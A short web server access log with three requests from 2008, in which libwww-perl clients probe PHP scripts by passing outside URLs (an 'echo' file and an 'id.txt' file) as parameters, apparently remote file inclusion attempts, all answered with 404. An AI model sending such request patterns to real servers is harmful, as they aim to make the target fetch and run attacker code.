216.235.247.169 - - [21/Aug/2008:23:14:32 -0500] "GET /logs/errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:23:14:32 -0500] "GET /errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.230.21.231 - - [21/Aug/2008:23:15:52 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
